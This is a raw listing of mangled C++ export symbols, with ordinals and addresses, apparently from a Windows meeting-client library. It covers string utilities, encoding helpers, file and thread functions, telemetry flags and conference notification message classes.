              ?WriteData@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62610x42add0
              ?WriteData@?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62620x42d130
              ?WriteData@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62630x42c9c0
              ?WriteData@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62640x428fd0
              ?WriteData@?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62650x42de90
              ?WriteData@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62660x42bee0
              ?WriteData@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62670x428640
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62680x42c5a0
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62690x42a790
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62700x42e9b0
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62710x42a070
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62720x428d60
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62730x42cdb0
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62740x4294d0
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62750x42f820
              ?WriteData@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62760x42f000
              ?WriteData@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62770x42b420
              ?WriteData@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62780x42acc0
              ?WriteData@?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62790x42dd80
              ?WriteData@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62800x42c4d0
              ?WriteData@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62810x42c2f0
              ?WriteData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62820x42e8e0
              ?WriteData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62830x428c90
              ?WriteData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62840x4293c0
              ?WriteData@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62850x42f710
              ?WriteData@?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@MAEHPAVICmmArchiveObjWritter@3@@Z62860x42abb0
              ?XMLDecode@?$CStringT@D@Cmm@@QAEXXZ62870x405090
              ?XMLDecode@?$CStringT@_W@Cmm@@QAEXXZ62880x403110
              ?XMLEncode@?$CStringT@D@Cmm@@QAEXXZ62890x4050f0
              ?XMLEncode@?$CStringT@_W@Cmm@@QAEXXZ62900x403170
              ?Yield@CThread@Cmm@@SAXXZ62910x417370
              ?YieldCurrentThread@PlatformThread@@SAXXZ62920x45f0c0
              ?_LoadString@?$CStringT@D@Cmm@@SAHPAUHINSTANCE__@@HPADH@Z62930x403230
              ?_LoadString@?$CStringT@D@Cmm@@SAHPAUHINSTANCE__@@HPA_WH@Z62940x403210
              ?_LoadString@?$CStringT@_W@Cmm@@SAHPAUHINSTANCE__@@HPADH@Z62950x403230
              ?_LoadString@?$CStringT@_W@Cmm@@SAHPAUHINSTANCE__@@HPA_WH@Z62960x403210
              ?_OnTimer@CTimerProc@Cmm@@IAEXPAUHWND__@@IIK@Z62970x451dd0
              ?_Search@CSearchDir@Cmm@@CAXPBUCmmDir@@HPAHPAX@Z62980x412370
              ?_ThreadProc@CRefThread@Cmm@@CGKPAX@Z62990x417380
              ?_ThreadProc@CThread@Cmm@@CGKPAX@Z63000x417200
              ?_cstring_assign@Cmm@@YAXAAV?$CStringT@D@1@ABUtagVARIANT@@H@Z63010x413f40
              ?_cstring_assign@Cmm@@YAXAAV?$CStringT@_W@1@ABUtagVARIANT@@H@Z63020x413fe0
              ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPBDI@Z63030x413db0
              ?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z63040x413df0
              ?_cstring_set@Cmm@@YAXAAV?$CStringT@_W@1@IPBDI@Z63050x413dd0
              ?_cstring_set@Cmm@@YAXAAV?$CStringT@_W@1@IPB_WI@Z63060x413e70
              ?_cstring_vfmt@Cmm@@YAXAAV?$CStringT@D@1@PBDPAD@Z63070x413e90
              ?_cstring_vfmt@Cmm@@YAXAAV?$CStringT@_W@1@PB_WPAD@Z63080x413eb0
              ?_data@?$CStringT@D@Cmm@@AAEPADXZ63090x405e40
              ?_data@?$CStringT@D@Cmm@@ABEPBDXZ63100x405e40
              ?_data@?$CStringT@_W@Cmm@@AAEPA_WXZ63110x403ff0
              ?_data@?$CStringT@_W@Cmm@@ABEPB_WXZ63120x403ff0
              ?_errorNames@XMLDocument@tinyxml2@@0PAPBDA63130x59f030
              ?append@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV12@@Z63140x406c80
              ?append@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@@Z63150x406d10
              ?append@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@II@Z63160x406ca0
              ?append@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ID@Z63170x406ce0
              ?append@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z63180x406d00
              ?append@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBDI@Z63190x406cf0
              ?append@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV12@@Z63200x404ec0
              ?append@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z63210x404f50
              ?append@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@II@Z63220x404ee0
              ?append@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@I_W@Z63230x404f20
              ?append@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z63240x404f40
              ?append@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_WI@Z63250x404f30
              ?as_string@StringPiece@Cmm@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ63260x4111c0
              ?assign@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@@Z63270x406c60
              ?assign@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV34@II@Z63280x406c30
              ?assign@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ID@Z63290x406c40
              ?assign@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z63300x406c50
              ?assign@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBDI@Z63310x405d40
              ?assign@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z63320x404ea0
              ?assign@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@II@Z63330x404e70
              ?assign@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@I_W@Z63340x404e80
              ?assign@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z63350x404e90
              ?assign@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_WI@Z63360x403ee0
              ?at@?$CStringT@D@Cmm@@QAEAADI@Z63370x4066e0
              ?at@?$CStringT@D@Cmm@@QBEABDI@Z63380x4066e0
              ?at@?$CStringT@_W@Cmm@@QAEAA_WI@Z63390x4048b0
              ?at@?$CStringT@_W@Cmm@@QBEAB_WI@Z63400x4048b0
              ?bLogEnabled_@CCmmPerfTelemetry@@0HA63410x5af8f8
              ?bMetricsEnabled_@CCmmPerfTelemetry@@0HA63420x5af8e4
              ?bMetricsInitialzed@CCmmPerfTelemetry@@0HA63430x5af904
              ?bSendEnabled_@CCmmPerfTelemetry@@0U?$atomic@_N@std@@A63440x5af8e1
              ?bUrgentEvent_@CCmmPerfTelemetry@@0HA63450x5af8e8
              ?bXMPPReconnect_@CCmmPerfTelemetry@@0HA63460x5af8fc
              ?base64Decode@Cmm@@YAPAEABV?$CStringT@_W@1@AAI@Z63470x4147f0
              ?base64DecodeA@Cmm@@YAPAEABV?$CStringT@D@1@AAI@Z63480x414800
              ?base64DecodeW@Cmm@@YAPAEABV?$CStringT@_W@1@AAI@Z63490x4147f0
              ?base64Encode@Cmm@@YA?AV?$CStringT@_W@1@PAEI@Z63500x414830
              ?base64EncodeA@Cmm@@YA?AV?$CStringT@D@1@PAEI@Z63510x414850
              ?base64EncodeW@Cmm@@YA?AV?$CStringT@_W@1@PAEI@Z63520x414830
              ?base64FreeDecodeBuffer@Cmm@@YAXAAPAE@Z63530x414810
              ?begin@?$CStringT@D@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@XZ63540x406da0
              ?begin@?$CStringT@D@Cmm@@QBE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@XZ63550x406da0
              ?begin@?$CStringT@_W@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@XZ63560x405010
              ?begin@?$CStringT@_W@Cmm@@QBE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@XZ63570x405010
              ?begin@ListValue@@QAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVValue@@@std@@@std@@@std@@XZ63580x45dc50
              ?begin@ListValue@@QBE?AV?$_Vector_const_iterator@V?$_Vector_val@U?$_Simple_types@PAVValue@@@std@@@std@@@std@@XZ63590x45dc50
              ?begin@StringPiece@Cmm@@QBEPBDXZ63600x40c630
              ?begin_keys@DictionaryValue@@QBE?AVkey_iterator@1@XZ63610x45dc30
              ?c_str@?$CStringT@D@Cmm@@QBEPBDI@Z63620x405e20
              ?c_str@?$CStringT@D@Cmm@@QBEPBDXZ63630x405e40
              ?c_str@?$CStringT@_W@Cmm@@QBEPB_WI@Z63640x403fd0
              ?c_str@?$CStringT@_W@Cmm@@QBEPB_WXZ63650x403ff0
              ?capacity@?$CStringT@D@Cmm@@QAEIXZ63660x405070
              ?capacity@?$CStringT@_W@Cmm@@QAEIXZ63670x405070
              ?capacity@StringPiece@Cmm@@QBEIXZ63680x40c640
              ?cbegin@?$CStringT@D@Cmm@@QAE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@XZ63690x406da0
              ?cbegin@?$CStringT@_W@Cmm@@QAE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@XZ63700x405010
              ?cend@?$CStringT@D@Cmm@@QAE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@XZ63710x406dc0
              ?cend@?$CStringT@_W@Cmm@@QAE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@XZ63720x405030
              ?clear@?$CStringT@D@Cmm@@QAEXXZ63730x406d80
              ?clear@?$CStringT@_W@Cmm@@QAEXXZ63740x404fe0
              ?clear@FilePath@Cmm@@QAEXXZ63750x4113b0
              ?clear@StringPiece@Cmm@@QAEXXZ63760x4110f0
              ?cmm_astr_match@@YAHPBD0DH@Z63770x413c90
              ?cmm_fs_mkdirs@@YAXPB_W@Z63780x412aa0
              ?cmm_fs_read@@YAHPB_WAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z63790x412d90
              ?cmm_fs_read_v2@@YAHPB_WAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z63800x412e50
              ?cmm_fs_rmdirs@@YAHPB_W@Z63810x412b40
              ?cmm_fs_tmpfile@@YAHPA_WPB_W1H@Z63820x412c10
              ?cmm_fs_tmppath@@YAPB_WXZ63830x412bc0
              ?cmm_mem_alloc@@YAPAXI@Z63840x412a70
              ?cmm_mem_free@@YAXPAX@Z63850x412a90
              ?cmm_mem_realloc@@YAPAXPAXI@Z63860x412a80
              ?cmm_memcmp_s@Cmm@@YAHPBXI0IPAH@Z63870x459e60
              ?cmm_memset_s@Cmm@@YAHPAXIHI@Z63880x459ed0
              ?cmm_range_spliteline@@YAIPBDURANGE@@AAU1@@Z63890x4139c0
              ?cmm_range_spliteline@@YAIPB_WURANGE@@AAU1@@Z63900x413a20
              ?cmm_range_spliteline@@YAIV?$CStrRangeT@D@Cmm@@IAAV12@@Z63910x4138f0
              ?cmm_range_spliteline@@YAIV?$CStrRangeT@_W@Cmm@@IAAV12@@Z63920x413950
              ?cmm_safe_path@@YAHPB_W@Z63930x413cd0
              ?cmm_str_convert@@YAIHPADIHPBDI@Z63940x4137c0
              ?cmm_str_convert@@YAIHPADIPB_WI@Z63950x4136f0
              ?cmm_str_convert@@YAIHPA_WIPBDI@Z63960x413660
              ?cmm_str_tod@@YAPADPBD0AAN@Z63970x4138b0
              ?cmm_str_tod@@YAPA_WPB_W0AAN@Z63980x4138d0
              ?cmm_str_tol@@YAPADPBD0AAJH@Z63990x413870
              ?cmm_str_tol@@YAPA_WPB_W0AAJH@Z64000x413890
              ?cmm_str_u8extent@@YAIPBDI@Z64010x4135b0
              ?cmm_urldec@@YAHPBDPAD@Z64020x413b10
              ?cmm_urlenc@@YAXPBDPADI@Z64030x413a80
              ?cmm_wstr_match@@YAHPB_W0_WH@Z64040x413cb0
              ?compare@?$CStringT@D@Cmm@@QBEHABV12@@Z64050x4064e0
              ?compare@?$CStringT@D@Cmm@@QBEHABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z64060x406540
              ?compare@?$CStringT@D@Cmm@@QBEHIIABV12@@Z64070x406450
              ?compare@?$CStringT@D@Cmm@@QBEHIIABV12@I@Z64080x4063e0
              ?compare@?$CStringT@D@Cmm@@QBEHIIABV12@II@Z64090x4063a0
              ?compare@?$CStringT@D@Cmm@@QBEHIIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z64100x4064d0
              ?compare@?$CStringT@D@Cmm@@QBEHIIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@II@Z64110x4063d0
              ?compare@?$CStringT@D@Cmm@@QBEHIIPBD@Z64120x406470
              ?compare@?$CStringT@D@Cmm@@QBEHIIPBDI@Z64130x406410
              ?compare@?$CStringT@D@Cmm@@QBEHPBD@Z64140x406500
              ?compare@?$CStringT@_W@Cmm@@QBEHABV12@@Z64150x4046a0
              ?compare@?$CStringT@_W@Cmm@@QBEHABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z64160x404700
              ?compare@?$CStringT@_W@Cmm@@QBEHIIABV12@@Z64170x404610
              ?compare@?$CStringT@_W@Cmm@@QBEHIIABV12@I@Z64180x4045a0
              ?compare@?$CStringT@_W@Cmm@@QBEHIIABV12@II@Z64190x404560
              ?compare@?$CStringT@_W@Cmm@@QBEHIIABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z64200x404690
              ?compare@?$CStringT@_W@Cmm@@QBEHIIABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z64210x404590
              ?compare@?$CStringT@_W@Cmm@@QBEHIIPB_W@Z64220x404630
              ?compare@?$CStringT@_W@Cmm@@QBEHIIPB_WI@Z64230x4045d0
              ?compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z64240x4046c0
              ?compare@StringPiece@Cmm@@QBEHABV12@@Z64250x411180
              ?copy@StringPiece@Cmm@@QBEIPADII@Z64260x459fa0
              ?crbegin@?$CStringT@D@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@@std@@XZ64270x406dc0
              ?crbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ64280x405030
              ?crend@?$CStringT@D@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@@std@@XZ64290x406da0
              ?crend@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ64300x405010
              ?data@?$CStringT@D@Cmm@@QBEPBDXZ64310x405e40
              ?data@?$CStringT@_W@Cmm@@QBEPB_WXZ64320x403ff0
              ?data@StringPiece@Cmm@@QBEPBDXZ64330x40c630
              ?empty@?$CStringT@D@Cmm@@QBE_NXZ64340x405000
              ?empty@?$CStringT@_W@Cmm@@QBE_NXZ64350x405000
              ?empty@DictionaryValue@@QBE_NXZ64360x45dc20
              ?empty@FilePath@Cmm@@QBE_NXZ64370x405000
              ?empty@ListValue@@QBE_NXZ64380x45dc70
              ?empty@StringPiece@Cmm@@QBE_NXZ64390x4110e0
              ?end@?$CStringT@D@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@XZ64400x406dc0
              ?end@?$CStringT@D@Cmm@@QBE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@XZ64410x406dc0
              ?end@?$CStringT@_W@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@XZ64420x405050
              ?end@?$CStringT@_W@Cmm@@QBE?AV?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@XZ64430x405030
              ?end@ListValue@@QAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVValue@@@std@@@std@@@std@@XZ64440x45dcc0
              ?end@ListValue@@QBE?AV?$_Vector_const_iterator@V?$_Vector_val@U?$_Simple_types@PAVValue@@@std@@@std@@@std@@XZ64450x45dcc0
              ?end@StringPiece@Cmm@@QBEPBDXZ64460x411250
              ?end_keys@DictionaryValue@@QBE?AVkey_iterator@1@XZ64470x45dc50
              ?ends_with@StringPiece@Cmm@@QBE_NABV12@@Z64480x411220
              ?erase@?$CStringT@D@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@V34@0@Z64490x406d50
              ?erase@?$CStringT@D@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@V34@@Z64500x406d30
              ?erase@?$CStringT@D@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@4@0@Z64510x406d50
              ?erase@?$CStringT@D@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@D@std@@@std@@@4@@Z64520x406d30
              ?erase@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@II@Z64530x406d20
              ?erase@?$CStringT@_W@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@V34@0@Z64540x404fb0
              ?erase@?$CStringT@_W@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@V34@@Z64550x404f90
              ?erase@?$CStringT@_W@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@4@0@Z64560x404fb0
              ?erase@?$CStringT@_W@Cmm@@QAE?AV?$_String_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@4@@Z64570x404f90
              ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z64580x404f60
              ?event_index_@CCmmPerfTelemetry@@0U?$atomic@K@std@@A64590x5af8f0
              ?extended_family@CPU@Cmm@@QBEHXZ64600x403ad0
              ?extended_model@CPU@Cmm@@QBEHXZ64610x44bcd0
              ?family@CPU@Cmm@@QBEHXZ64620x40c640
              ?find@?$CStringT@D@Cmm@@QBEIABV12@I@Z64630x406970
              ?find@?$CStringT@D@Cmm@@QBEIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I@Z64640x406a10
              ?find@?$CStringT@D@Cmm@@QBEIDI@Z64650x406990
              ?find@?$CStringT@D@Cmm@@QBEIPBDI@Z64660x4069d0
              ?find@?$CStringT@D@Cmm@@QBEIPBDII@Z64670x4069a0
              ?find@?$CStringT@_W@Cmm@@QBEIABV12@I@Z64680x404bb0
              ?find@?$CStringT@_W@Cmm@@QBEIABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@I@Z64690x404c10
              ?find@?$CStringT@_W@Cmm@@QBEIPB_WI@Z64700x404c00
              ?find@?$CStringT@_W@Cmm@@QBEIPB_WII@Z64710x404bd0
              ?find@?$CStringT@_W@Cmm@@QBEI_WI@Z64720x404af0
              ?find@StringPiece@Cmm@@QBEIABV12@I@Z64730x459fd0
              ?find@StringPiece@Cmm@@QBEIDI@Z64740x45a050
              ?find_first_not_of@?$CStringT@D@Cmm@@QBEIABV12@I@Z64750x406a20
              ?find_first_not_of@?$CStringT@D@Cmm@@QBEIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I@Z64760x406af0
              ?find_first_not_of@?$CStringT@D@Cmm@@QBEIDI@Z64770x406a70
              ?find_first_not_of@?$CStringT@D@Cmm@@QBEIPBDI@Z64780x406ab0
              ?find_first_not_of@?$CStringT@D@Cmm@@QBEIPBDII@Z64790x406a40
              ?find_first_not_of@?$CStringT@_W@Cmm@@QBEIABV12@I@Z64800x404c20
              ?find_first_not_of@?$CStringT@_W@Cmm@@QBEIABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@I@Z64810x404d10
              ?find_first_not_of@?$CStringT@_W@Cmm@@QBEIPB_WI@Z64820x404cc0
              ?find_first_not_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z64830x404c40
              ?find_first_not_of@?$CStringT@_W@Cmm@@QBEI_WI@Z64840x404c70
              ?find_first_not_of@StringPiece@Cmm@@QBEIABV12@I@Z64850x45a210
              ?find_first_not_of@StringPiece@Cmm@@QBEIDI@Z64860x45a2d0
              ?find_first_of@?$CStringT@D@Cmm@@QBEIABV12@I@Z64870x406890
              ?s_firsttime@?1???0CSBMBMessage_NotifyBandwidthLimitUpdate@@QAE@XZ@4HA68480x59eb78
              ?s_firsttime@?1???0CSBMBMessage_NotifyBeforeObjDestroyed@@QAE@XZ@4HA68490x59ece8
              ?s_firsttime@?1???0CSBMBMessage_NotifyBeforeTerm@@QAE@XZ@4HA68500x59eac0
              ?s_firsttime@?1???0CSBMBMessage_NotifyCallCommand@@QAE@XZ@4HA68510x59ebb8
              ?s_firsttime@?1???0CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@QAE@XZ@4HA68520x59ebf0
              ?s_firsttime@?1???0CSBMBMessage_NotifyCheckUpdateResponse@@QAE@XZ@4HA68530x59ef14
              ?s_firsttime@?1???0CSBMBMessage_NotifyClaimHost@@QAE@XZ@4HA68540x59eb54
              ?s_firsttime@?1???0CSBMBMessage_NotifyClientRegistry@@QAE@XZ@4HA68550x59eeb8
              ?s_firsttime@?1???0CSBMBMessage_NotifyClientUnRegistry@@QAE@XZ@4HA68560x59ef94
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfPListChanged@@QAE@XZ@4HA68570x59ec4c
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfSelected@@QAE@XZ@4HA68580x59ef9c
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfStart@@QAE@XZ@4HA68590x59ea38
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfStop@@QAE@XZ@4HA68600x59ed88
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfTokenResult@@QAE@XZ@4HA68610x59eac8
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfZRMeetingInfo@@QAE@XZ@4HA68620x59eb5c
              ?s_firsttime@?1???0CSBMBMessage_NotifyConferenceStatus@@QAE@XZ@4HA68630x59eb10
              ?s_firsttime@?1???0CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAE@XZ@4HA68640x59ec84
              ?s_firsttime@?1???0CSBMBMessage_NotifyDeviceReady@@QAE@XZ@4HA68650x59efe4
              ?s_firsttime@?1???0CSBMBMessage_NotifyDownloadProgress@@QAE@XZ@4HA68660x59ef1c
              ?s_firsttime@?1???0CSBMBMessage_NotifyEndSetting@@QAE@XZ@4HA68670x59ee6c
              ?s_firsttime@?1???0CSBMBMessage_NotifyInvitationSent@@QAE@XZ@4HA68680x59ed28
              ?s_firsttime@?1???0CSBMBMessage_NotifyInviteFBBuddy@@QAE@XZ@4HA68690x59ee38
              ?s_firsttime@?1???0CSBMBMessage_NotifyJoinByMeetingNumber@@QAE@XZ@4HA68700x59ef6c
              ?s_firsttime@?1???0CSBMBMessage_NotifyJoinFailForForceUpdate@@QAE@XZ@4HA68710x59ee50
              ?s_firsttime@?1???0CSBMBMessage_NotifyLeaveConf@@QAE@XZ@4HA68720x59ed7c
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingCallResponse@@QAE@XZ@4HA68730x59ed70
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAE@XZ@4HA68740x59efd8
